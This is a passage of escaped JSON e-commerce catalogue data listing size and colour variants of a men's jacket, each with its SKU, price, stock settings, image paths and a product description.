Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-s-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Green\"},\"228\":{\"sku\":\"MJ02-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-S-Orange\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"229\":{\"sku\":\"MJ02-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-S-Red\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"230\":{\"sku\":\"MJ02-M-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-M-Green\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-m-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Green\"},\"231\":{\"sku\":\"MJ02-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-M-Orange\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"232\":{\"sku\":\"MJ02-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-M-Red\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"233\":{\"sku\":\"MJ02-L-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-L-Green\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-l-green\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Green\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"image\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-green_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/j\\/mj02-green_alt1.jpg,\\/m\\/j\\/mj02-green_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Green\"},\"234\":{\"sku\":\"MJ02-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-L-Orange\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"235\":{\"sku\":\"MJ02-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-L-Red\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip pullover.<br \\/>&bull; Split pocket. <br \\/>&bull; Thumb holes. <br \\/>&bull; Machine wash\\/hang to dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"51\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"hyperion-elements-jacket-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/j\\/mj02-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"236\":{\"sku\":\"MJ02-XL-Green\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Jackets\",\"product_websites\":\"base\",\"name\":\"Hyperion Elements Jacket-XL-Green\",\"description\":\"<p>Boldly face high winds, frigid temps and stormy weather the whole winter through in the Hyperion Elements Jacket. LumaTech&trade; insulating technology helps maintain your core temperature and wick sweat. The smooth shell is water repellent and quilted to retain body heat.<\\/p>\\n<p>&bull; Lime 1\\/4 zip 